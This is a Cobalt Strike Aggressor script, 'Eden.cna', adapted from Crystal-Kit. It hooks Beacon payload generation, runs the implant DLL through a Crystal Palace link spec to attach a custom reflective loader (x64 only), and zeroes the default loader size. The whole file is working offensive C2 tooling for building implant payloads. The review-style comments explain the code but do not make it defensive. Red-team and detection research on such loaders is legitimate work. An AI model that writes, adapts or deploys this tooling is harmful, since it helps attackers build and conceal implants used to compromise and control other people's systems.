# ------------------------------------
# CNA Script for Eden.
# Based on: https://github.com/rasta-mouse/Crystal-Kit/blob/e234f9adafda01b36ec6443e0912a16a1819a980/crystalkit.cna
# ------------------------------------
import crystalpalace.spec.* from: crystalpalace.jar;
import java.util.HashMap;
# ----------------------------------------------
# Print information to the Script Console
# $1 = message
# ----------------------------------------------
sub print_info {
    # Writes one line to the Script Console: a [HH:mm:ss] timestamp, the
    # [EDEN] tag wrapped in the \cE ... \o console formatting escapes, then
    # the caller's message ($1).
    local('$stamp $tag');
    $stamp = formatDate("[HH:mm:ss] ");
    $tag = "\cE[EDEN]\o ";
    println($stamp . $tag . $1);
}
# Top-level statement: runs when the script is loaded and confirms the load in the Script Console.
print_info("[+] Eden.cna loaded!");
# ------------------------------------
# Applies eden ldr to the passed Beacon payload.
#
# $1 = Beacon payload file name
# $2 = Beacon payload (dll binary)
# $3 = Beacon architecture (x86/x64)
#
# returns The Beacon executable payload updated with eden ldr.
# ------------------------------------
sub apply_eden_ldr {
    # Links the Beacon DLL passed in $2 against the eden.spec link spec and
    # returns the resulting bytes. Returns $null when the architecture is
    # rejected, the spec cannot be parsed, or the build yields nothing.
    # $1 (payload file name) is not read in this function.
    local('$payload $target_arch $file_path $link_spec $vars $built $size');
    $payload = $2;
    $target_arch = $3;

    # Only the literal "x86" is rejected, although the warning says "x64 only".
    # NOTE(review): any other value falls through to the build - confirm the
    # hooks only ever pass "x86" or "x64".
    if ($target_arch eq "x86") {
        warn("[!] Eden ldr is x64 only");
        return $null;
    }

    # eden.spec is resolved relative to script_resource("") and parsed as-is.
    # NOTE(review): the file's contents decide what gets built, so it needs the
    # same access control and review as this script.
    $file_path = getFileProper(script_resource(""), "eden.spec");

    print_info("Parsing $+ $file_path $+ ...");
    $link_spec = [LinkSpec Parse: $file_path];

    # Failure is detected by an empty string form of the Parse result.
    # NOTE(review): confirm whether Parse reports errors by exception instead.
    if (strlen($link_spec) == 0) {
        warn("[!] Failed to parse eden.spec");
        return $null;
    }

    # Run the spec over the Beacon DLL with an empty variable map.
    print_info("Applying Eden ldr spec...");
    $vars = [new HashMap];
    $built = [$link_spec run: $payload, $vars];

    if (strlen($built) == 0) {
        warn("[!] Failed to build Eden ldr");
        return $null;
    }

    $size = strlen($built);
    print_info("[+] Eden ldr payload size: " . $size . " bytes");
    return $built;
}
# ------------------------------------
# Set the BEACON_RDLL_GENERATE Hook
#
# $1 = Beacon payload file name
# $2 = Beacon payload (dll binary)
# $3 = Beacon architecture (x86/x64)
# $4 = User defined options map provided via the restapi
#
# returns The Beacon executable payload updated with eden ldr.
# ------------------------------------
set BEACON_RDLL_GENERATE {
    # Forwards the file name, payload DLL and architecture to apply_eden_ldr.
    # $4 (user defined options map) is not read. The helper's result,
    # including $null on its failure paths, is returned unchanged.
    local('$patched');
    $patched = apply_eden_ldr($1, $2, $3);
    return $patched;
}
# ------------------------------------
# Set the BEACON_RDLL_GENERATE_LOCAL Hook
#
# $1 = Beacon payload file name
# $2 = Beacon payload (dll binary)
# $3 = Beacon architecture (x86/x64)
# $4 = Parent beacon ID
# $5 = GetModuleHandleA pointer
# $6 = GetProcAddress pointer
# $7 = User defined options map provided via the restapi
#
# returns The Beacon executable payload updated with eden ldr.
# ------------------------------------
set BEACON_RDLL_GENERATE_LOCAL {
    # Same path as BEACON_RDLL_GENERATE: only $1-$3 are forwarded.
    # The parent beacon ID ($4), the GetModuleHandleA / GetProcAddress
    # pointers ($5, $6) and the options map ($7) are not read.
    local('$patched');
    $patched = apply_eden_ldr($1, $2, $3);
    return $patched;
}
# ------------------------------------
# Remove the reflective loader from the Beacon template (i.e. we just want the Beacon DLL).
# ------------------------------------
set BEACON_RDLL_SIZE {
# Returns the string "0" unconditionally; no argument is inspected, so this
# applies to every build regardless of architecture.
# NOTE(review): the generate hooks return $null for x86 or a failed spec
# build - confirm the payload produced in that case is still the one intended.
return "0";
}